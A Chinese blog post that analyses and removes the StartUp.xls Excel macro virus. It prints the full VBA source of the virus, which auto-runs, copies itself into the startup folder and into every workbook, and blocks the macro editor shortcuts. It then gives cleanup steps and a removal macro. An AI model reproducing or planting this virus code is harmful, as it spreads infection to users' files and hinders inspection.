今天一个朋友让我帮忙看一个问题,说是Excel文件一打开再保存就提示“此文档中包含宏、ActiveX 控件、XML 扩展包信息或Web组件。他们中可能含个人作息,这些作息无法能过设置“工具”菜单下“选项”对话框“安全性”选项卡中的“保存时从文件属性中删除个人作息”来删除”。当时只是以为设置的问题,后来查了好几小时才发现原来是中了个宏病毒,名字是:StartUp.xls,中间定位病毒的过程也比较曲折(主要是自己学艺不精)。
病毒样本如下:
Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = ActiveWorkbook.Name ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = ActiveSheet.Name Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1) Sheets(n$).Select End If End Sub Sub back() On Error Resume Next Application.OnKey "%{F8}", "StartUp.xls!escape" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnSheetActivate = "StartUp.xls!cop" Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop" Workbooks.Open Application.StartupPath & "\StartUp.xls" End Sub Sub escape() On Error Resume Next Application.OnSheetActivate = "StartUp.xls!back" Application.OnKey "%{F11}" Application.OnKey "%{F8}" Application.SendKeys "%{F11}" Application.SendKeys "%{F8}" For Each book In Workbooks Application.DisplayAlerts = False If book "StartUp.xls" Then book.Sheets("StartUp").Delete Next For Each book In Workbooks If book.Name = "StartUp.xls" Then book.Close End If Next End Sub
通过参考网上一些资料,采取以下的方法处理,可以清除病毒并使感染文件在修改保存后也清除病毒(网上有人说用360或卡巴直接杀会导致文件打不开,没有试验,不知是真是假):
一、删除
C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\Excel11.xls
,该文件删除后,Excel会自动重建的;
二、删除
C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\XLSTART\StartUp.xls
;
三、新建一个空的StartUp.xls,然后录制宏(随便录,只是为了能打开VBA编辑器);
四、从“工具->宏->宏”里面,选择刚才录制的宏,选择“编辑”,把全部内容都选中,把用下列内容替换:
Sub auto_open() On Error Resume Next Application.ScreenUpdating = False ActiveWindow.Visible = False n$ = ActiveWorkbook.Name Workbooks(n$).Close (False) Application.OnSheetActivate = "StartUp.xls!cop" End Sub Sub cop() On Error Resume Next Dim VBC As Object Dim Name As String 'Dim delComponent As VBComponent 网上有人贴的代码里有这句,经实测,这句会导致编译错误。VBA中没有VBComponent对象 Name = "StartUp" For Each book In Workbooks Set delComponent = book.VBAProject.VBComponents(Name) book.VBAProject.VBComponents.Remove delComponent Next End Sub
五、保存,然后再打开染毒文档,修改保存一下就可以清除掉感染的病毒。